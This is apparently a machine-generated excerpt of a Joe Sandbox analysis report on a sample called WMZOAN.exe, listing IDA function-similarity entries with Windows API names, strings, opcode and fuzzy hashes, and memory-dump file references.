                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CreateEvent$CriticalInitializeSection
                                            • String ID:
                                            • API String ID: 926662266-0
                                            • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                            • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                            • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                            • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: __except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 1467352782-3733052814
                                            • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                            • Instruction ID: 5743eafedc82cf26ed1674fe0ba34b3f44d0f61a7ec9152a98fbdab1dada9a2f
                                            • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                            • Instruction Fuzzy Hash: 2C717FBA90C6C58AD7628F35D8887BD7BA0FB04B84F188176DECC67A89CB2CD451C744
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CreateFrameInfo__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2558813199-1018135373
                                            • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                            • Instruction ID: 3f530ccdf84eb6b22e4b54b71aaac78048654cbaa97401d085703643f929d5d2
                                            • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                            • Instruction Fuzzy Hash: 5A5162BA61878196D621EF35E88826D77A4FB89B90F180174EBCD17B55CF3CE461CB00
                                            APIs
                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FFB23B0821E
                                              • Part of subcall function 00007FFB23B08BE0: HeapFree.KERNEL32 ref: 00007FFB23B08BF6
                                              • Part of subcall function 00007FFB23B08BE0: GetLastError.KERNEL32 ref: 00007FFB23B08C00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                                            • String ID: 3T$C:\Users\user\Documents\WMZOAN.exe
                                            • API String ID: 2724796048-3983934549
                                            • Opcode ID: c7b6bf20ccc4f9845d0c36dee35ecfe46c8e6b938c98f74557c05a74a3d0106e
                                            • Instruction ID: f5e6c968a4f643340020bf4fce3554ba52c45f1717354d1577bbc7becd4f653f
                                            • Opcode Fuzzy Hash: c7b6bf20ccc4f9845d0c36dee35ecfe46c8e6b938c98f74557c05a74a3d0106e
                                            • Instruction Fuzzy Hash: F94180BAA08A9285EB16EF31EC941BD6694BF44BC0B4C4075F9CE97B85DE3DE6418300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                            • Instruction ID: 523c8c87dd673b167e10579d1f79c7fa65344ea14935052ba305674c4325a4f8
                                            • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                            • Instruction Fuzzy Hash: 3741A76AB29A8181DB21CF75E8883AD6761FB88B94F484131EECE97794DF7CD441CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID: csm
                                            • API String ID: 3997070919-1018135373
                                            • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                            • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                            • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                            • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                            APIs
                                              • Part of subcall function 00007FFB23B03A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFB23B03A63
                                            • __GSHandlerCheckCommon.LIBCMT ref: 00007FFB23B10993
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CheckCommonHandler__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 1543384424-629598281
                                            • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                            • Instruction ID: fa796d30b5a922cca8df2527cadca46efd0e11325c261140cc4c356438ce6e0c
                                            • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                            • Instruction Fuzzy Hash: 2C11DF66A187C185E711AF36E8892AD6664EB44FC0F0C8075EECC2BB46CE38D951C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: TimerWaitable
                                            • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                            • API String ID: 1823812067-484248852
                                            • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                            • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                            • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                            • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                            APIs
                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFB23B0112F), ref: 00007FFB23B039E0
                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFB23B0112F), ref: 00007FFB23B03A21
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                            • Instruction ID: c094a7921cee73de9344df31890d9729a7e9ed610c00b176b462ce203e0db6bf
                                            • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                            • Instruction Fuzzy Hash: 55111976A18B8182EB628F25E84826DB7E5FB88B84F5C4270DACD17B58DF3DD5518B00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: TimerWaitable
                                            • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                            • API String ID: 1823812067-3336177065
                                            • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                            • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                            • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                            • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                            • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                            • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                            • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710